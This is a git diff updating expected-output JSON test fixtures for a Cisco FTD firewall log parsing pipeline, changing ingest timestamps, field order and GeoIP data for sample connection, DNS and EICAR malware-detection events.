"kind": "event", @@ -4680,7 +4680,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983289Z", + "ingested": "2021-12-14T14:40:06.019758222Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4762,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983294800Z", + "ingested": "2021-12-14T14:40:06.019758874Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4844,7 +4844,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:10.983316300Z", + "ingested": "2021-12-14T14:40:06.019759882Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4908,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983321600Z", + "ingested": "2021-12-14T14:40:06.019760284Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4964,7 +4964,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983326800Z", + "ingested": "2021-12-14T14:40:06.019760674Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +5026,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:35:10.983330700Z", + "ingested": "2021-12-14T14:40:06.019761053Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 6fed9b7418c..087d2432459 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -16,15 +16,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255488700Z", + "ingested": "2021-12-14T14:40:15.787909748Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -131,15 +131,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255497100Z", + "ingested": "2021-12-14T14:40:15.787913180Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -238,37 +238,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "eu-central-1.ec2.archive.ubuntu.com", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "81.2.69.144", - "packets": 0 + "packets": 0, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "eu-central-1.ec2.archive.ubuntu.com", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -277,15 +271,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -323,7 +317,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255502700Z", + "ingested": "2021-12-14T14:40:15.787913981Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -382,37 +376,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "siem-inside", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "81.2.69.144", - "packets": 2 + "packets": 2, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "siem-inside", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -421,15 +409,15 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -468,7 +456,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255508Z", + "ingested": "2021-12-14T14:40:15.787914619Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", @@ -535,27 +523,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -564,13 +546,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -608,7 +590,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255513300Z", + "ingested": "2021-12-14T14:40:15.787915252Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -666,27 +648,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "81.2.69.144", - "packets": 29001 + "packets": 29001, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -702,9 +678,6 @@ "scheme": "http", "domain": "eu-central-1.ec2.archive.ubuntu.com" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", @@ -714,6 +687,9 @@ ], "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -757,7 +733,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:35:19.255518700Z", + "ingested": "2021-12-14T14:40:15.787915858Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", @@ -829,27 +805,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -858,13 +828,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -902,7 +872,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255524100Z", + "ingested": "2021-12-14T14:40:15.787916449Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -960,27 +930,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -996,15 +960,15 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1048,7 +1012,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:19.255529400Z", + "ingested": "2021-12-14T14:40:15.787917061Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", @@ -1128,13 +1092,13 @@ "packets": 0, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "1", "transport": "icmp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1172,7 +1136,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:19.255534900Z", + "ingested": "2021-12-14T14:40:15.787917647Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1252,15 +1216,15 @@ "10.0.100.30:8000" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1304,7 +1268,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:35:19.255540300Z", + "ingested": "2021-12-14T14:40:15.787918240Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index 0a3f9cc5b09..52059c43e18 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -22,25 +22,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:54:25.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:54:25.000Z", "ecs": { "version": "1.12.0" }, @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450128Z", + "ingested": "2021-12-14T14:40:18.397013048Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -124,25 +124,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:55:02.000Z", "file": { "name": "exploit.exe" }, + "@timestamp": "2019-08-14T14:55:02.000Z", "ecs": { "version": "1.12.0" }, @@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450136100Z", + "ingested": "2021-12-14T14:40:18.397015674Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -226,25 +226,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:00:29.000Z", "file": { "name": "eicar.com" }, + "@timestamp": "2019-08-14T15:00:29.000Z", "ecs": { "version": "1.12.0" }, @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450162100Z", + "ingested": "2021-12-14T14:40:18.397016144Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -328,25 +328,25 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:01:41.000Z", "file": { "name": "eicar.com.txt" }, + "@timestamp": "2019-08-14T15:01:41.000Z", "ecs": { "version": "1.12.0" }, @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450167300Z", + "ingested": "2021-12-14T14:40:18.397016542Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -430,22 +430,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:28.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -453,6 +452,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:28.000Z", "ecs": { "version": "1.12.0" }, @@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450172700Z", + "ingested": "2021-12-14T14:40:18.397016921Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -543,22 +543,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:03:33.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -566,6 +565,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:03:33.000Z", "ecs": { "version": "1.12.0" }, @@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450177500Z", + "ingested": "2021-12-14T14:40:18.397017337Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -656,22 +656,21 @@ "port": 8000, "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "siem-ftd", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T15:09:43.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -679,6 +678,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-14T15:09:43.000Z", "ecs": { "version": "1.12.0" }, @@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450181500Z", + "ingested": "2021-12-14T14:40:18.397017744Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,20 +758,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -790,22 +784,21 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:39:03.000Z", "file": { "size": 184, "name": "eicar_com.zip", @@ -813,6 +806,7 @@ "sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad" } }, + "@timestamp": "2019-08-16T09:39:03.000Z", "ecs": { "version": "1.12.0" }, @@ -836,7 +830,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450201900Z", + "ingested": "2021-12-14T14:40:18.397018130Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: 